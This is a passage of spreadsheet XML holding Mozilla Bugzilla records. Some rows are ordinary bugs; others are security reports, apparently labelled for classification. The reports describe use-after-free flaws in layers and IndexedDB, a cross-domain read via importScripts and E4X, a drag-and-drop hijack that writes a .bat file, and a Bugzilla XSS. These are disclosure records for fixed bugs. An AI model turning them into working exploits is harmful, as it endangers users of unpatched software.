      <c r="E261" t="n">
        <v>1</v>
      </c>
      <c r="F261" t="n">
        <v>1</v>
      </c>
      <c r="G261" t="n">
        <v>6</v>
      </c>
      <c r="H261" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I261" t="inlineStr">
        <is>
          <t>Webtools Graveyard</t>
        </is>
      </c>
      <c r="J261" t="inlineStr">
        <is>
          <t>Mozbot</t>
        </is>
      </c>
      <c r="K261" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L261" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M261" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N261" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O261" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P261" t="inlineStr">
        <is>
          <t>[has-patch]</t>
        </is>
      </c>
      <c r="Q261" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R261" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S261" t="inlineStr">
        <is>
          <t>2.6</t>
        </is>
      </c>
      <c r="T261" t="n">
        <v>1</v>
      </c>
      <c r="U261" t="n">
        <v>0</v>
      </c>
      <c r="V261" t="n">
        <v>18</v>
      </c>
      <c r="W261" t="inlineStr">
        <is>
          <t>While trying to make firebot use the new bzbot-into-mozbot code from bug 292492.
I ran into a nice bug. If you specify more than 1 channel per product (comma
seperated. such as 'Firefox =&gt; #firefox,#firebot,#bugs' When a bug change comes
into the module, the FetchBug data is dumped into the last channel 3 times. (I
tried changing the order, to #firefox,#bugs,#firebot, and it was #firebot which
got it instead of #bugs, but the bug persisted.)
It should have output the FetchBug data to #firefox, #firebot, and #bugs though.
:-) Works fine with only 1 channel though.
I'm guessing the bug is somewhere in this code, bug I'm not sure what. Its like
the target isn't getting an updated $channel, and just the last one.
# We can't use "local" here, or the target doesn't show
# up properly in the GotURI after FetchBug.
$event-&gt;{'target'} = $channel;
$self-&gt;say($event, $message);
$self-&gt;FetchBug($event, $bug_id, 'bug')
    unless $said_bug{$channel . $bug_id};
$said_to{$channel} = 1;</t>
        </is>
      </c>
      <c r="X261" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="262">
      <c r="A262" t="n">
        <v>1422949</v>
      </c>
      <c r="B262" t="inlineStr">
        <is>
          <t>2017-12-04 12:15:48 -0800</t>
        </is>
      </c>
      <c r="C262" t="inlineStr">
        <is>
          <t>Upgrade Leanplum to 2.0.4</t>
        </is>
      </c>
      <c r="D262" t="inlineStr">
        <is>
          <t>2017-12-05 11:55:55 -0800</t>
        </is>
      </c>
      <c r="E262" t="n">
        <v>1</v>
      </c>
      <c r="F262" t="n">
        <v>1</v>
      </c>
      <c r="G262" t="n">
        <v>2</v>
      </c>
      <c r="H262" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I262" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J262" t="inlineStr">
        <is>
          <t>Build &amp; Test</t>
        </is>
      </c>
      <c r="K262" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L262" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M262" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N262" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O262" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P262" t="inlineStr">
        <is>
          <t>[mma]</t>
        </is>
      </c>
      <c r="Q262" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R262" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S262" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T262" t="n">
        <v>1</v>
      </c>
      <c r="U262" t="n">
        <v>0</v>
      </c>
      <c r="V262" t="n">
        <v>3</v>
      </c>
      <c r="W262" t="inlineStr">
        <is>
          <t>Upgrade Leanplum to 2.0.4</t>
        </is>
      </c>
      <c r="X262" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="263">
      <c r="A263" t="n">
        <v>636621</v>
      </c>
      <c r="B263" t="inlineStr">
        <is>
          <t>2011-02-24 17:18:25 -0800</t>
        </is>
      </c>
      <c r="C263" t="inlineStr">
        <is>
          <t>Please unfreeze mozilla-central nightly updates</t>
        </is>
      </c>
      <c r="D263" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E263" t="n">
        <v>1</v>
      </c>
      <c r="F263" t="n">
        <v>1</v>
      </c>
      <c r="G263" t="n">
        <v>5</v>
      </c>
      <c r="H263" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I263" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J263" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K263" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L263" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M263" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N263" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O263" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P263" t="inlineStr"/>
      <c r="Q263" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R263" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S263" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T263" t="n">
        <v>1</v>
      </c>
      <c r="U263" t="n">
        <v>0</v>
      </c>
      <c r="V263" t="n">
        <v>3</v>
      </c>
      <c r="W263" t="inlineStr">
        <is>
          <t>Please unfreeze mozilla-central nightly updates. I'd like the update created tonight to be offered to nightly users tomorrow.</t>
        </is>
      </c>
      <c r="X263" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="264">
      <c r="A264" t="n">
        <v>1233346</v>
      </c>
      <c r="B264" t="inlineStr">
        <is>
          <t>2015-12-17 01:19:46 -0800</t>
        </is>
      </c>
      <c r="C264" t="inlineStr">
        <is>
          <t>Potential buffer overrun in Windows ICE interface name code</t>
        </is>
      </c>
      <c r="D264" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:44 -0700</t>
        </is>
      </c>
      <c r="E264" t="n">
        <v>1</v>
      </c>
      <c r="F264" t="n">
        <v>1</v>
      </c>
      <c r="G264" t="n">
        <v>3</v>
      </c>
      <c r="H264" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I264" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J264" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K264" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L264" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M264" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N264" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O264" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P264" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q264" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R264" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S264" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T264" t="n">
        <v>1</v>
      </c>
      <c r="U264" t="n">
        <v>0</v>
      </c>
      <c r="V264" t="n">
        <v>24</v>
      </c>
      <c r="W264" t="inlineStr">
        <is>
          <t>This call to snprintf does not check its return value:
  https://dxr.mozilla.org/mozilla-central/source/media/mtransport/third_party/nICEr/src/stun/addrs.c#192
If the |FriendlyName| is bigger then |IFNAMSIZ|, |munged_ifname| is not going to be null terminated and the subsequent while loops will go off in the weeds.</t>
        </is>
      </c>
      <c r="X264" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="265">
      <c r="A265" t="n">
        <v>1242668</v>
      </c>
      <c r="B265" t="inlineStr">
        <is>
          <t>2016-01-25 11:51:44 -0800</t>
        </is>
      </c>
      <c r="C265" t="inlineStr">
        <is>
          <t>Memory corruption in mozilla::layers::ClientLayerManager::DidComposite appears to be exploitable /use after free</t>
        </is>
      </c>
      <c r="D265" t="inlineStr">
        <is>
          <t>2016-09-22 17:18:57 -0700</t>
        </is>
      </c>
      <c r="E265" t="n">
        <v>1</v>
      </c>
      <c r="F265" t="n">
        <v>1</v>
      </c>
      <c r="G265" t="n">
        <v>3</v>
      </c>
      <c r="H265" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I265" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J265" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K265" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L265" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N265" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O265" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P265" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q265" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R265" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S265" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T265" t="n">
        <v>1</v>
      </c>
      <c r="U265" t="n">
        <v>0</v>
      </c>
      <c r="V265" t="n">
        <v>61</v>
      </c>
      <c r="W265" t="inlineStr">
        <is>
          <t>Created attachment 8711812
useAfterFree-testcase-new.html
STR:
Load the attached testcase and click anywhere in the content area.  This will open a new window while alert is called in the original window.  Close the new window, then proceed to close the alert box in the original window.
The currently release build of firefox crashes usually with an access violation while trying to read from memory address 0xE5E5E5E5.  This address originates from the css equivalent( like background: #E5E5E5 ). 
I'm currently still trying to find a way to automate the value that ends up there but here's a partial explanation as I understand it so far.  To begin with see http://mxr.mozilla.org/mozilla-release/source/browser/themes/osx/downloads/downloads.css#46
Note that some internal browser elements are styled using this, and as the screen renders itself for vertical sync it actually copies the value to memory many times over representing one rendering of that frame.
I'm certain that this is exploitable, I've ran through many iterations manually and twice I have already overwritten what would normally be 0xE5E5E5E5 with a pointer to an address that was accessible.  I have also just confirmed that the current release build also crashes in linux in this same situation.
This all originated from some click jacking work I've been doing, and I'm still in the process of that and I have to get to an audit on pocket soon(this took priority obviously once I found it.)
Once I've finished my current work I'll try to complete migrating my linux OS to a full VM setup so I can test and debug in both windows and linux at the same time which will hopefully allow me to get a more complete understanding of exactly what is happening here.</t>
        </is>
      </c>
      <c r="X265" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="266">
      <c r="A266" t="n">
        <v>109143</v>
      </c>
      <c r="B266" t="inlineStr">
        <is>
          <t>2001-11-08 14:09:50 -0800</t>
        </is>
      </c>
      <c r="C266" t="inlineStr">
        <is>
          <t>Search engine &lt;menulist/&gt; has no content first time search sidebar tab is opened</t>
        </is>
      </c>
      <c r="D266" t="inlineStr">
        <is>
          <t>2008-07-31 01:19:04 -0700</t>
        </is>
      </c>
      <c r="E266" t="n">
        <v>1</v>
      </c>
      <c r="F266" t="n">
        <v>1</v>
      </c>
      <c r="G266" t="n">
        <v>2</v>
      </c>
      <c r="H266" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I266" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J266" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K266" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L266" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M266" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N266" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O266" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P266" t="inlineStr">
        <is>
          <t>fixed on trunk</t>
        </is>
      </c>
      <c r="Q266" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R266" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S266" t="inlineStr">
        <is>
          <t>mozilla0.9.6</t>
        </is>
      </c>
      <c r="T266" t="n">
        <v>1</v>
      </c>
      <c r="U266" t="n">
        <v>0</v>
      </c>
      <c r="V266" t="n">
        <v>20</v>
      </c>
      <c r="W266" t="inlineStr">
        <is>
          <t>Checkins between 2001-11-06 03:00:00 and 2001-11-07 09:00:00 to
mozilla/content/xul/templates caused a regression where the list of search
engines in the search sidebar tab is empty first time you view it.  If you close
the sidebar tab and reopen it the &lt;menulist/&gt; is populated correctly.</t>
        </is>
      </c>
      <c r="X266" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="267">
      <c r="A267" t="n">
        <v>568148</v>
      </c>
      <c r="B267" t="inlineStr">
        <is>
          <t>2010-05-25 20:03:42 -0700</t>
        </is>
      </c>
      <c r="C267" t="inlineStr">
        <is>
          <t>Combining "importScripts" of WebWorker with E4X causes information disclosure</t>
        </is>
      </c>
      <c r="D267" t="inlineStr">
        <is>
          <t>2014-10-12 13:20:51 -0700</t>
        </is>
      </c>
      <c r="E267" t="n">
        <v>1</v>
      </c>
      <c r="F267" t="n">
        <v>1</v>
      </c>
      <c r="G267" t="n">
        <v>3</v>
      </c>
      <c r="H267" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I267" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J267" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K267" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L267" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M267" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N267" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O267" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P267" t="inlineStr">
        <is>
          <t>[sg:high] fixed-in-tracemonkey [critsmash-high:patch]</t>
        </is>
      </c>
      <c r="Q267" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R267" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S267" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T267" t="n">
        <v>1</v>
      </c>
      <c r="U267" t="n">
        <v>0</v>
      </c>
      <c r="V267" t="n">
        <v>18</v>
      </c>
      <c r="W267" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
"importScripts" method reads remote resources as a javascript even if that is not a JavaScript file. 
And "importScripts" method sent cookies to remote server at requesting their resources.
Additionally, "importScripts" method can read HTML file as JavaScript source using E4X feature.
Thus attacker can read the victim's protected HTML file using "importScripts" and E4X across the domain.
Reproducible: Always
Steps to Reproduce:
see demo page for details.
http://openmya.hacker.jp/hasegawa/PoC/webworker.html
Actual Results:  
attacker can read remote contents.
Expected Results:  
"importScripts" should fail to read HTML as a javascript source, like as &lt;script src="html"&gt;</t>
        </is>
      </c>
      <c r="X267" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="268">
      <c r="A268" t="n">
        <v>1317873</v>
      </c>
      <c r="B268" t="inlineStr">
        <is>
          <t>2016-11-15 18:26:40 -0800</t>
        </is>
      </c>
      <c r="C268" t="inlineStr">
        <is>
          <t>Tricking user into creating an executable by hijacking drag n drop of an image</t>
        </is>
      </c>
      <c r="D268" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:10 -0700</t>
        </is>
      </c>
      <c r="E268" t="n">
        <v>1</v>
      </c>
      <c r="F268" t="n">
        <v>1</v>
      </c>
      <c r="G268" t="n">
        <v>3</v>
      </c>
      <c r="H268" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I268" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J268" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K268" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L268" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M268" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N268" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O268" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P268" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main97+][adv-esr91.6+]</t>
        </is>
      </c>
      <c r="Q268" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R268" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S268" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T268" t="n">
        <v>0</v>
      </c>
      <c r="U268" t="n">
        <v>0</v>
      </c>
      <c r="V268" t="n">
        <v>30</v>
      </c>
      <c r="W268" t="inlineStr">
        <is>
          <t>Created attachment 8811122
DnD-PoC.html
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36
Steps to reproduce:
Run attached PoC on latest firefox (I confirmed this on latest stable and nightly) and simply drag and drop the img seen into any folder on your local disk.
Actual results:
We can successfully hijack 'application/x-moz-file-promise-dest-filename' and 'application/x-moz-file-promise-url' and be able to set the filename and contents of the newly created file. The result is a .bat file with the contents to run calc on windows. 
I assume the file promise feature exists in order to drag and drop images you see on the web and easily save them on your desktop. If we drag and drop anchor tags into a folder we just get an 'internet shortcut' file pointing to the url. 
It's clear though this is unintended, if we assume this feature is purely for images then an attacker could easily create an executable with an icon of an image, with some tricks to obfuscate the '.exe' and we could potentially have a user unintentionally open an executable assuming its the image they saw.
Also, because of Bug 1317023 (I assume since this part does not work with e10s disabled) if we choose 'application/x-moz-file-promise-url' to equal say file:///C:// we can save a file locally with the full directory contents of C: drive. But this would require the user to resubmit the 'image' they just saved.
Expected results:
Perhaps 'application/x-moz-file-promise-dest-filename' and 'application/x-moz-file-promise-url' should be read only? and also make sure that those are only set on valid images.</t>
        </is>
      </c>
      <c r="X268" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="269">
      <c r="A269" t="n">
        <v>514499</v>
      </c>
      <c r="B269" t="inlineStr">
        <is>
          <t>2009-09-03 12:23:42 -0700</t>
        </is>
      </c>
      <c r="C269" t="inlineStr">
        <is>
          <t>Passphrase not verified with auto-login</t>
        </is>
      </c>
      <c r="D269" t="inlineStr">
        <is>
          <t>2018-09-24 14:24:50 -0700</t>
        </is>
      </c>
      <c r="E269" t="n">
        <v>1</v>
      </c>
      <c r="F269" t="n">
        <v>1</v>
      </c>
      <c r="G269" t="n">
        <v>2</v>
      </c>
      <c r="H269" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I269" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J269" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K269" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L269" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M269" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N269" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O269" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P269" t="inlineStr">
        <is>
          <t>fixed by bug 513191</t>
        </is>
      </c>
      <c r="Q269" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R269" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S269" t="inlineStr">
        <is>
          <t>0.7</t>
        </is>
      </c>
      <c r="T269" t="n">
        <v>1</v>
      </c>
      <c r="U269" t="n">
        <v>0</v>
      </c>
      <c r="V269" t="n">
        <v>1</v>
      </c>
      <c r="W269" t="inlineStr">
        <is>
          <t>Autologin doesn't pass any arguments, so verifyPassphrase isn't called.
This should be fixed with the patch in bug 513191 because it just uses this.{username,password,passphrase}.</t>
        </is>
      </c>
      <c r="X269" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="270">
      <c r="A270" t="n">
        <v>1577107</v>
      </c>
      <c r="B270" t="inlineStr">
        <is>
          <t>2019-08-28 00:59:17 -0700</t>
        </is>
      </c>
      <c r="C270" t="inlineStr">
        <is>
          <t>Use After Free in IndexedDB</t>
        </is>
      </c>
      <c r="D270" t="inlineStr">
        <is>
          <t>2024-05-30 10:02:12 -0700</t>
        </is>
      </c>
      <c r="E270" t="n">
        <v>1</v>
      </c>
      <c r="F270" t="n">
        <v>1</v>
      </c>
      <c r="G270" t="n">
        <v>3</v>
      </c>
      <c r="H270" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I270" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J270" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K270" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L270" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M270" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N270" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O270" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P270" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main70+][adv-esr68.2+]</t>
        </is>
      </c>
      <c r="Q270" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R270" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S270" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T270" t="n">
        <v>1</v>
      </c>
      <c r="U270" t="n">
        <v>0</v>
      </c>
      <c r="V270" t="n">
        <v>39</v>
      </c>
      <c r="W270" t="inlineStr">
        <is>
          <t>Created attachment 9088647
IndexedDB_UAF.html
```cpp
void IDBObjectStore::AppendIndexUpdateInfo(
    int64_t aIndexID, const KeyPath&amp; aKeyPath, bool aUnique, bool aMultiEntry,
    const nsCString&amp; aLocale, JSContext* aCx, JS::Handle&lt;JS::Value&gt; aVal,
    nsTArray&lt;IndexUpdateInfo&gt;&amp; aUpdateInfoArray, ErrorResult&amp; aRv) {
  const bool localeAware = !aLocale.IsEmpty();
  if (!aMultiEntry) {
	...
    return;
  }
  JS::Rooted&lt;JS::Value&gt; val(aCx);
  if (NS_FAILED(aKeyPath.ExtractKeyAsJSVal(aCx, aVal, val.address()))) {
    return;
  }
  bool isArray;
  if (!JS_IsArrayObject(aCx, val, &amp;isArray)) {
    IDB_REPORT_INTERNAL_ERR();
    aRv.Throw(NS_ERROR_DOM_INDEXEDDB_UNKNOWN_ERR);
    return;
  }
  if (isArray) {
    JS::Rooted&lt;JSObject*&gt; array(aCx, &amp;val.toObject());
    uint32_t arrayLength;
    if (NS_WARN_IF(!JS_GetArrayLength(aCx, array, &amp;arrayLength))) {
      IDB_REPORT_INTERNAL_ERR();
      aRv.Throw(NS_ERROR_DOM_INDEXEDDB_UNKNOWN_ERR);
      return;
    }
    for (uint32_t arrayIndex = 0; arrayIndex &lt; arrayLength; arrayIndex++) {
      JS::Rooted&lt;JS::Value&gt; arrayItem(aCx);
      if (NS_WARN_IF(!JS_GetElement(aCx, array, arrayIndex, &amp;arrayItem))) {	//	JS_GetElement can trigger js getter, call deleteIndex here will free `aLocale`.
        IDB_REPORT_INTERNAL_ERR();
        aRv.Throw(NS_ERROR_DOM_INDEXEDDB_UNKNOWN_ERR);
        return;
      }
      Key value;
      auto result = value.SetFromJSVal(aCx, arrayItem, aRv);
      if (!result.Is(Ok, aRv) || value.IsUnset()) {
        // Not a value we can do anything with, ignore it.
        aRv.SuppressException();
        continue;
      }
      IndexUpdateInfo* updateInfo = aUpdateInfoArray.AppendElement();
      updateInfo-&gt;indexId() = aIndexID;
      updateInfo-&gt;value() = value;
      if (localeAware) {
        auto result =
            value.ToLocaleBasedKey(updateInfo-&gt;localizedValue(), aLocale, aRv);//	UAF occurs!
        if (NS_WARN_IF(!result.Is(Ok, aRv))) {
          if (result.Is(Invalid, aRv)) {
            aRv.Throw(NS_ERROR_DOM_INDEXEDDB_UNKNOWN_ERR);
          }
          return;
        }
      }
    }
  } else {
	...
  }
}
```</t>
        </is>
      </c>
      <c r="X270" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="271">
      <c r="A271" t="n">
        <v>660053</v>
      </c>
      <c r="B271" t="inlineStr">
        <is>
          <t>2011-05-26 12:04:43 -0700</t>
        </is>
      </c>
      <c r="C271" t="inlineStr">
        <is>
          <t>[SECURITY] If a BUGLIST cookie is compromised, it can be used to XSS show_bug.cgi and inject HTML into &lt;head&gt;</t>
        </is>
      </c>
      <c r="D271" t="inlineStr">
        <is>
          <t>2011-08-24 13:47:05 -0700</t>
        </is>
      </c>
      <c r="E271" t="n">
        <v>1</v>
      </c>
      <c r="F271" t="n">
        <v>1</v>
      </c>
      <c r="G271" t="n">
        <v>4</v>
      </c>
      <c r="H271" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I271" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J271" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K271" t="inlineStr">
        <is>
          <t>2.16</t>
        </is>
      </c>
      <c r="L271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N271" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O271" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P271" t="inlineStr">
        <is>
          <t>[3.4.x and older only; 3.6 and newer not affected][infrasec:xss][ws:moderate]</t>
        </is>
      </c>
      <c r="Q271" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R271" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S271" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T271" t="n">
        <v>1</v>
      </c>
      <c r="U271" t="n">
        <v>0</v>
      </c>
      <c r="V271" t="n">
        <v>16</v>
      </c>
      <c r="W271" t="inlineStr">
        <is>
          <t>Bugzilla 3.4.11 and below are affected by an XSS that is only possible if the user's BUGLIST cookie is somehow compromised. The bug_list.first and bug_list.last variables in the bug/navigate.html.tmpl template are not properly escaped when displayed.
As far as we know, it is not possible to compromise the BUGLIST cookie in Bugzilla, and as such we are not treating this as a high-priority security issue, but still something that we should fix for the 3.4 branch in case administrators have customized their installation in such a way that BUGLIST could have been compromised, or there are other programs on the user's system that could somehow have compromised the cookie.</t>
        </is>
      </c>
      <c r="X271" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="272">
      <c r="A272" t="n">
        <v>1872920</v>
      </c>
      <c r="B272" t="inlineStr">
        <is>
          <t>2024-01-03 13:09:43 -0800</t>
        </is>
      </c>
      <c r="C272" t="inlineStr">
        <is>
          <t>Sandbox escape via process type confusion in mozwer</t>
        </is>
      </c>
      <c r="D272" t="inlineStr">
        <is>
          <t>2024-09-16 00:26:53 -0700</t>
        </is>
      </c>
      <c r="E272" t="n">
        <v>1</v>
      </c>
      <c r="F272" t="n">
        <v>1</v>
      </c>
      <c r="G272" t="n">
        <v>3</v>
      </c>
      <c r="H272" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I272" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J272" t="inlineStr">
        <is>
          <t>Crash Reporting</t>
        </is>
      </c>
      <c r="K272" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L272" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M272" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N272" t="inlineStr">
